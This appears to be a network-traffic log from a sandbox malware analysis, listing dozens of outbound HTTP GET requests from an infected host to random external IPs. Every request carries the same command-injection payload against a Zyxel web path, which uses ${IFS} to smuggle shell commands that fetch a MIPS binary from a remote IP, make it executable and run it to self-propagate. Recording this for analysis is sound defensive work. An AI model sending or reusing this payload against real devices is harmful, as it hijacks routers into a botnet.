                                            Feb 2, 2024 06:20:59.384979010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            854192.168.2.1553528188.138.27.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384999037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            855192.168.2.1548588132.91.9.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385040998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            856192.168.2.1538752125.38.250.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385092974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            857192.168.2.153768646.211.196.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385121107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            858192.168.2.1539916173.58.85.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385163069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            859192.168.2.1548244152.30.97.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385195971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            860192.168.2.155432624.115.45.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385236979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            861192.168.2.1559572198.254.194.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385281086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            862192.168.2.1552922181.57.246.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385333061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            863192.168.2.155651231.162.169.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385365009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            864192.168.2.1559570156.111.165.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385386944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            865192.168.2.154851676.122.134.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385445118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            866192.168.2.1536698172.85.103.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385467052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            867192.168.2.154860482.28.175.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385500908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            868192.168.2.154518441.93.162.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385546923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            869192.168.2.154063834.159.16.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385608912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            870192.168.2.153296871.26.186.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385649920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            871192.168.2.153313092.162.20.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385670900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            872192.168.2.15347408.115.103.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385730982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            873192.168.2.155946435.203.213.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385756969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            874192.168.2.154704895.64.177.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385793924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            875192.168.2.1536276197.16.215.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385859013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            876192.168.2.153879690.20.202.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385883093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            877192.168.2.1558072103.119.36.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385941982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            878192.168.2.1550636145.140.229.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.385973930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            879192.168.2.1557230117.31.96.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386002064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            880192.168.2.1546402190.169.196.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386054993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            881192.168.2.1550376111.198.112.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386105061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            882192.168.2.1556180133.239.218.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386148930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            883192.168.2.1546956202.185.111.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386179924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            884192.168.2.155822263.78.148.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386219025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            885192.168.2.154598651.234.206.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386255026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            886192.168.2.154439244.10.237.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386291027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            887192.168.2.1541356218.137.98.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386352062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            888192.168.2.1546400125.103.116.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386387110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            889192.168.2.153490887.91.44.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386436939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            890192.168.2.153368627.171.165.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386483908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            891192.168.2.155589213.232.197.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386518955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            892192.168.2.1557240139.250.201.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386544943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            893192.168.2.155218480.53.224.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386591911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            894192.168.2.153663018.152.160.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386636019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            895192.168.2.1535658173.203.27.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386662006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            896192.168.2.153615452.124.137.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386697054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            897192.168.2.154336227.96.232.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386724949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            898192.168.2.154201888.34.152.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386759996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            899192.168.2.1545926159.247.50.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386811972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            900192.168.2.153598435.46.68.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386822939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            901192.168.2.1559336170.221.101.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386857033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            902192.168.2.1558492156.202.246.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386888027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            903192.168.2.1557096141.242.64.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386938095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            904192.168.2.154784212.55.34.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.386965036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            905192.168.2.1550092201.21.242.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387036085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            906192.168.2.153684476.58.124.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387075901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            907192.168.2.1542732192.241.104.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387109041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            908192.168.2.153858620.233.247.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387152910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            909192.168.2.1545554204.179.182.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387202024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            910192.168.2.1547760203.146.231.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387236118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            911192.168.2.1543122143.57.193.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387279034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            912192.168.2.153950827.138.70.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387335062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            913192.168.2.1555770120.183.162.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387366056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            914192.168.2.155276251.57.182.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387397051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            915192.168.2.1534406158.248.206.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387422085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            916192.168.2.1558496118.255.242.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387490034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            917192.168.2.1556346217.186.210.249443
                                            TimestampBytes transferredDirectionData
